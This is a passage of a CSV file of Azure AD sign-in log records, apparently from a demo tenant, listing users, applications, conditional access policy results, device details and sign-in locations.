Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",cbffb959-9fbe-4abe-95ed-0d8530491400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cbffb959-9fbe-4abe-95ed-0d8530491400,SigninLogs,Sucess,36.6404686,-78.26995087
+902,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:59.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,00c78ca1-4a2a-4019-91ba-c3aaf88d8e8e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 16:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0eace7f1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8d371308-4e1f-476f-97d6-c0eace7f1400,SigninLogs,Sucess,33.7984581,-84.38828278
+903,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:22.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4e09d517-1c9d-4d8c-b42e-2b4d00ffc1a4,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",69bf3c7f-96b8-4aae-959c-a7bb5f481300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,69bf3c7f-96b8-4aae-959c-a7bb5f481300,SigninLogs,Sucess,41.90428925,-85.99833679
+904,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:53.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,32d11921-4d05-4be3-90ab-e8acb2e72667,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",85789f99-3a4c-45a5-91bc-019497b91300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,85789f99-3a4c-45a5-91bc-019497b91300,SigninLogs,Sucess,50.6406517,5.572050095
+905,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:41.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1ed67620-b507-4863-8a02-e76d15949669,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,MCAS Conditional Access Application Control,36238d04-e66d-48fc-a73e-69b0d827d794,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea327d1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8d371308-4e1f-476f-97d6-c0ea327d1400,SigninLogs,Sucess,33.7984581,-84.38828278
+906,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:59.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,00c78ca1-4a2a-4019-91ba-c3aaf88d8e8e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 16:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0eace7f1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8d371308-4e1f-476f-97d6-c0eace7f1400,SigninLogs,Sucess,33.7984581,-84.38828278
+907,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:57.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0fc6a063-4561-44b0-b31a-72955bb4babb,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",41cc5746-ae7e-445a-962a-17f6804b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,41cc5746-ae7e-445a-962a-17f6804b1300,SigninLogs,Sucess,36.6404686,-78.26995087
+908,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:23.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",13087585-23e2-41d3-bc5e-408312364b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,13087585-23e2-41d3-bc5e-408312364b00,SigninLogs,Sucess,40.75891113,-73.97901917
+909,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:35.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f2418124-b57f-4c28-bdaa-69ce59fd113c,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c6df9c5c-6712-4175-a3db-58ced54d1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c6df9c5c-6712-4175-a3db-58ced54d1400,SigninLogs,Sucess,41.90428925,-85.99833679
+910,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:39.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,92115e61-b1ce-4b90-bc5e-1a0214692a3b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': 